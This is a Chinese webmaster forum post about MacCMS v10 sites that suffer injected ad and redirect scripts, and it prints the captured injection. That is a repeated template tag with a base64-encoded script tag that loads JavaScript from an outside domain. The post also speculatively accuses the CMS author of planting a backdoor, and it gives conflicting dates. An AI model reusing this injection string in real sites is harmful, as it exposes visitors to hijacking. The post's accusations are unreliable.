xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse xiuse

2核1G3M服务器88一季度

腾讯云,阿里云百度云等 折扣价→点我←

苹果cms10的一次尝试发现了苹果cms10被挂马极有可能是苹果cms作者故意的js漏洞或后门导致

匿名用户 超级版主组 2022/03/22 12:09:04

最近闲无事想建个站来玩玩,但是又不想写于是乎就找了搜索了一下,苹果cms就出现在搜索引擎上面了,看来苹果cms的SEO做的还是不错的.

被挂马表现:

播放视频时,有一定的概率会加载 http://union.maccms.com/html/top10.js苹果cms后台某处或者采集的资源打印奇怪的字符比如
{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuanM+PC9zY3JpcHQ+"))}{endif-A}{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuanM+PC9zY3JpcHQ+"))}{endif-A}{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuanM+PC9zY3JpcHQ+"))}{endif-A}
解码其中的Base64的字符串后是

这也就是传说中的DOM XSS攻击

其实苹果CMS一直以来都是加密了最重要的播放器载入js,而且一直在打开播放页的时候 player.js 会载入一个,//union.maccms.com/html/top10.js 文件,最近作者在这个文件当中加入了广告代码,所以苹果CMS全线跳广告,很多人以为被黑了,其实很多人猜测极大的可能性是作者作妖.不然为什么他要把开源的到github上面的static/js/player.js加密干嘛呢?

其实有去群里问过苹果cms的作者 union.maccms.com/html/top10.js 是干嘛用的,他说是防盗版程序用的,
然后就把关于,这个对话给删掉了(作者是群主).我在想既然都已经开源出来还防什么盗版嘛?

我想,为什么作者为什么不搞个社区版本,然后加个收费版呢?后来一想搞收费版本不如搞偷偷摸摸搞个跳转把站长的流量导到自己的站点放广告来的钱多.

我现在是博客时间写于是2020年10月30号(凌晨,程序员晚睡),
这里:记苹果CMS播放页被劫持跳转至棋牌网站的解决方案 2019年有人写的一篇博文,关于苹果cms后门是作者故意留的.当然篇博客写的方法对现在的苹果cms留的后门已经无效的了.因为它已经换了加密的方法.

解决方法

换一个cms系统: 比如 海洋cms, 马克斯cms, 飞飞cms, 赞片cms, 等等

苹果cms

TAGS 苹果cms后门 苹果cms被挂马

站长窝论坛版权声明 1、本帖标题:苹果cms10的一次尝试发现了苹果cms10被挂马极有可能是苹果cms作者故意的js漏洞或后门导致
2、论坛网址:站长窝论坛
3、站长窝论坛的资源部分来源于网络,如有侵权,请联系站长进行删除处理。
4、会员发帖仅代表会员个人观点,并不代表本站赞同其观点和对其真实性负责。
5、站长窝论坛一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本帖由匿名用户在站长窝论坛《苹果cms_苹果cms模板_教程》版块原创发布, 转载请注明出处!
评论
最新回复 (0)
返回